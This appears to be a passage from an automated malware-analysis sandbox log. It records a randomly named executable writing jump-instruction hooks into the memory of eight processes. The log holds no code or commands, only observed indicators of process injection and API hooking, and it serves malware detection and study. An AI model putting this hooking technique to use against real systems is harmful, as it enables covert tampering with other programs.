            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 3068 base: 69CA572C value: E9 AF C0 3E 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 3068 base: 769A6C19 value: E9 32 06 6F 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 3068 base: 769A4889 value: E9 82 D4 6E 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 3068 base: 76A91D20 value: E9 7B 03 60 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 3068 base: 76A0BF10 value: E9 4B 62 68 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 3068 base: 76A81610 value: E9 8B 0D 61 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 3068 base: 774D0078 value: E9 53 53 BC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 3068 base: 774EEB2A value: E9 D1 67 BA 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2684 base: 774CFA50 value: E9 3B 69 44 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2684 base: 774CFDA8 value: E9 93 68 44 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2684 base: 757158CD value: E9 2E B7 1F 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2684 base: 757182ED value: E9 AE 8D 1F 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2684 base: 7576DF21 value: E9 EA 45 1A 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2684 base: 75709AE0 value: E9 8B 8A 20 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2684 base: 756F5366 value: E9 55 BE 21 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2684 base: 756F3EFC value: E9 8F D3 21 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2684 base: 69CBA9B0 value: E9 3B 6D C5 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2684 base: 69CA572C value: E9 AF C0 C6 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2684 base: 769A6C19 value: E9 32 06 F7 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2684 base: 769A4889 value: E9 82 D4 F6 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2684 base: 76A91D20 value: E9 7B 03 E8 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2684 base: 76A0BF10 value: E9 4B 62 F0 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2684 base: 76A81610 value: E9 8B 0D E9 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2684 base: 774D0078 value: E9 53 53 44 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2684 base: 774EEB2A value: E9 D1 67 42 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2688 base: 774CFA50 value: E9 3B 69 EC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2688 base: 774CFDA8 value: E9 93 68 EC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2688 base: 757158CD value: E9 2E B7 C7 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2688 base: 757182ED value: E9 AE 8D C7 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2688 base: 7576DF21 value: E9 EA 45 C2 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2688 base: 75709AE0 value: E9 8B 8A C8 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2688 base: 756F5366 value: E9 55 BE C9 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2688 base: 756F3EFC value: E9 8F D3 C9 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2688 base: 69CBA9B0 value: E9 3B 6D 6D 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2688 base: 69CA572C value: E9 AF C0 6E 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2688 base: 769A6C19 value: E9 32 06 9F 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2688 base: 769A4889 value: E9 82 D4 9E 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2688 base: 76A91D20 value: E9 7B 03 90 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2688 base: 76A0BF10 value: E9 4B 62 98 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2688 base: 76A81610 value: E9 8B 0D 91 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2688 base: 774D0078 value: E9 53 53 EC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 2688 base: 774EEB2A value: E9 D1 67 EA 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1436 base: 774CFA50 value: E9 3B 69 BC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1436 base: 774CFDA8 value: E9 93 68 BC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Memory written: PID: 1436 base: 757158CD value: E9 2E B7 97 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 757182ED value: E9 AE 8D 97 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 7576DF21 value: E9 EA 45 92 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 75709AE0 value: E9 8B 8A 98 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 756F5366 value: E9 55 BE 99 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 756F3EFC value: E9 8F D3 99 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 69CBA9B0 value: E9 3B 6D 3D 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 69CA572C value: E9 AF C0 3E 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 769A6C19 value: E9 32 06 6F 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 769A4889 value: E9 82 D4 6E 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 76A91D20 value: E9 7B 03 60 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 76A0BF10 value: E9 4B 62 68 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 76A81610 value: E9 8B 0D 61 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 774D0078 value: E9 53 53 BC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 774EEB2A value: E9 D1 67 BA 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 774CFA50 value: E9 3B 69 D5 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 774CFDA8 value: E9 93 68 D5 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 757158CD value: E9 2E B7 B0 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 757182ED value: E9 AE 8D B0 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 7576DF21 value: E9 EA 45 AB 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 75709AE0 value: E9 8B 8A B1 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 756F5366 value: E9 55 BE B2 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 756F3EFC value: E9 8F D3 B2 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 69CBA9B0 value: E9 3B 6D 56 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 69CA572C value: E9 AF C0 57 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 769A6C19 value: E9 32 06 88 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 769A4889 value: E9 82 D4 87 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 76A91D20 value: E9 7B 03 79 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 76A0BF10 value: E9 4B 62 81 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 76A81610 value: E9 8B 0D 7A 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 774D0078 value: E9 53 53 D5 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 774EEB2A value: E9 D1 67 D3 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 774CFA50 value: E9 3B 69 C8 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 774CFDA8 value: E9 93 68 C8 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 757158CD value: E9 2E B7 A3 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 757182ED value: E9 AE 8D A3 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 7576DF21 value: E9 EA 45 9E 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 75709AE0 value: E9 8B 8A A4 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 756F5366 value: E9 55 BE A5 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 756F3EFC value: E9 8F D3 A5 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 69CBA9B0 value: E9 3B 6D 49 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 69CA572C value: E9 AF C0 4A 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 769A6C19 value: E9 32 06 7B 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 769A4889 value: E9 82 D4 7A 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 76A91D20 value: E9 7B 03 6C 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 76A0BF10 value: E9 4B 62 74 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 76A81610 value: E9 8B 0D 6D 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 774D0078 value: E9 53 53 C8 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 774EEB2A value: E9 D1 67 C6 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 774CFA50 value: E9 3B 69 32 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 774CFDA8 value: E9 93 68 32 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 757158CD value: E9 2E B7 0D 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 757182ED value: E9 AE 8D 0D 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 7576DF21 value: E9 EA 45 08 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 75709AE0 value: E9 8B 8A 0E 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 756F5366 value: E9 55 BE 0F 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 756F3EFC value: E9 8F D3 0F 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 69CBA9B0 value: E9 3B 6D B3 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 69CA572C value: E9 AF C0 B4 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 769A6C19 value: E9 32 06 E5 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 769A4889 value: E9 82 D4 E4 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 76A91D20 value: E9 7B 03 D6 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 76A0BF10 value: E9 4B 62 DE 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 76A81610 value: E9 8B 0D D7 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 774D0078 value: E9 53 53 32 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2248 base: 774EEB2A value: E9 D1 67 30 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 774CFA50 value: E9 3B 69 D8 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 774CFDA8 value: E9 93 68 D8 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 757158CD value: E9 2E B7 B3 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 757182ED value: E9 AE 8D B3 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 7576DF21 value: E9 EA 45 AE 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 75709AE0 value: E9 8B 8A B4 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 756F5366 value: E9 55 BE B5 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 756F3EFC value: E9 8F D3 B5 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 69CBA9B0 value: E9 3B 6D 59 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 69CA572C value: E9 AF C0 5A 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 769A6C19 value: E9 32 06 8B 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 769A4889 value: E9 82 D4 8A 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 76A91D20 value: E9 7B 03 7C 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 76A0BF10 value: E9 4B 62 84 89
